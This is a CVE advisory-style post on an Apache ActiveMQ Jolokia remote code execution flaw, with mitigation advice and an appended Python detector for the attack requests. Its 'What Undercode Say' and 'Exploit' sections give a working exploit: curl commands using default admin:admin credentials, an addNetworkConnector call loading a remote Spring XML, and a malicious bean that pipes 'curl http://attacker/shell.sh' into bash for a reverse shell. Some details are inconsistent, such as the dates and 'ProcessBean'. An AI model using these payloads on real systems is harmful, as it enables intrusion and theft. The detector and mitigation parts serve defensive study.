How the mentioned CVE works:
The Jolokia JMX-HTTP bridge is exposed at `/api/jolokia/` on the ActiveMQ web console. The default access policy permits `exec` operations on all `org.apache.activemq:` MBeans. An authenticated attacker calls `BrokerService.addNetworkConnector(String)` or `addConnector(String)` with a crafted discovery URI. This URI sets the VM transport's `brokerConfig` parameter, which loads a remote Spring XML context via `ResourceXmlApplicationContext`. Spring instantiates all singleton beans before the BrokerService validates the configuration, so malicious bean factory methods (e.g., `Runtime.exec()`) execute arbitrary code in the broker's JVM. The root cause is that the Jolokia policy does not restrict dangerous MBean operations. No additional authentication bypass is needed; valid web console credentials are sufficient. The attack works against default configurations where Jolokia is enabled. Versions before 5.19.4, and 6.0.0 up to but not including 6.2.3, are affected. The fix tightens the Jolokia access policy and adds validation to the VM transport. The issue is rated critical: it requires authentication, but it leads to full RCE. Exploitation is reliable and has been demonstrated in the wild.
dailycve form:
Platform: Apache ActiveMQ
Version: <5.19.4, 6.0.0-6.2.3
Vulnerability: Jolokia RCE
Severity: Critical
Date: 2024-04-22
Prediction: 2024-05-15
What Undercode Say:
Check Jolokia endpoint exposure:
curl -k -u admin:admin http://target:8161/api/jolokia/list
Enumerate MBeans for BrokerService:
curl -k -u admin:admin http://target:8161/api/jolokia/exec/org.apache.activemq:type=BrokerService,brokerName=localhost/addNetworkConnector/string:'vm://malicious?brokerConfig=http://evil/spring.xml'
Malicious spring.xml payload:
cat > spring.xml <<EOF
<beans xmlns="http://www.springframework.org/schema/beans">
  <bean class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg><value>curl http://attacker/shell.sh|bash</value></constructor-arg>
  </bean>
</beans>
EOF
python3 -m http.server 80
Exploit:
An authenticated attacker sends a POST to `/api/jolokia/` with the JSON body {"type":"exec","mbean":"org.apache.activemq:type=BrokerService,brokerName=localhost","operation":"addNetworkConnector(java.lang.String)","arguments":["vm://pwn?brokerConfig=http://attacker/spring.xml"]}. Spring loads the XML and the `ProcessBean` runs the command, yielding a reverse shell or a malware download.
Protection from this CVE:
Upgrade to 5.19.4 or 6.2.3. If that is not possible, restrict Jolokia access: set `org.apache.activemq.broker.jmx.useJolokia=false` or add firewall rules to block `/api/jolokia/`. Use strong authentication and network segmentation. Disable unused MBean operations via a custom Jolokia access policy.
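As an added example (not code from the original post or from the ActiveMQ project), the following detector flags Jolokia requests, in either the GET path form or the POST JSON form shown above, that invoke `addNetworkConnector` or `addConnector` on an `org.apache.activemq:` MBean with a `brokerConfig=` URI. The MBean name follows the post, the 203.0.113.5 address is a documentation-range placeholder, and the sample events are constructed for the example.

```python
import json
from urllib.parse import unquote

# Operations and URI parameter named in the advisory as the trigger.
RISKY_OPS = {"addNetworkConnector", "addConnector"}
RISKY_PARAM = "brokerconfig="
EXEC_MARKER = "/api/jolokia/exec/"

def _is_risky(mbean, operation, arguments):
    """True if an org.apache.activemq MBean op is passed a brokerConfig URI."""
    op = operation.split("(")[0]  # drop a Java signature like "(java.lang.String)"
    return (mbean.startswith("org.apache.activemq:") and op in RISKY_OPS
            and any(RISKY_PARAM in str(a).lower() for a in arguments))

def inspect_get_path(path):
    """GET form: /api/jolokia/exec/<mbean>/<operation>/<arguments...>."""
    path = unquote(path).replace("!/", "/")  # Jolokia escapes '/' in args as '!/'
    idx = path.find(EXEC_MARKER)
    parts = path[idx + len(EXEC_MARKER):].split("/", 2) if idx >= 0 else []
    return len(parts) == 3 and _is_risky(parts[0], parts[1], [parts[2]])

def inspect_post_body(body):
    """POST form: a JSON object (or bulk list) with type/mbean/operation/arguments."""
    try:
        req = json.loads(body)
    except ValueError:
        return False
    reqs = req if isinstance(req, list) else [req]
    return any(isinstance(r, dict) and r.get("type") == "exec" and
               _is_risky(r.get("mbean", ""), r.get("operation", ""), r.get("arguments", []))
               for r in reqs)

def flag_events(events):
    """Return (method, path) for every (method, path, body) event that matches."""
    return [(m, p) for m, p, body in events
            if (inspect_post_body(body) if m == "POST" else inspect_get_path(p))]

# Constructed sample events (method, path, body); not real traffic.
RISKY_MBEAN = "org.apache.activemq:type=BrokerService,brokerName=localhost"
SAMPLE_EVENTS = [
    ("GET", "/api/jolokia/list", ""),
    ("GET", "/api/jolokia/exec/" + RISKY_MBEAN
            + "/addNetworkConnector/vm:!/!/x?brokerConfig=http:!/!/203.0.113.5!/spring.xml", ""),
    ("POST", "/api/jolokia/", json.dumps({"type": "exec", "mbean": RISKY_MBEAN,
        "operation": "addNetworkConnector(java.lang.String)",
        "arguments": ["vm://pwn?brokerConfig=http://203.0.113.5/spring.xml"]})),
    ("POST", "/api/jolokia/", json.dumps({"type": "exec", "mbean": RISKY_MBEAN,
        "operation": "addNetworkConnector(java.lang.String)",
        "arguments": ["static:(tcp://10.0.0.2:61616)"]})),  # legitimate, not flagged
]
```

Running `flag_events(SAMPLE_EVENTS)` returns only the GET exec request and the first POST; the `list` call and the legitimate `static:` network connector are left alone.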
Impact:
Full remote code execution on the ActiveMQ host. Compromise of message broker, data exfiltration, lateral movement, and denial of service. Critical risk to infrastructure.
Sources:
Reported By: www.cve.org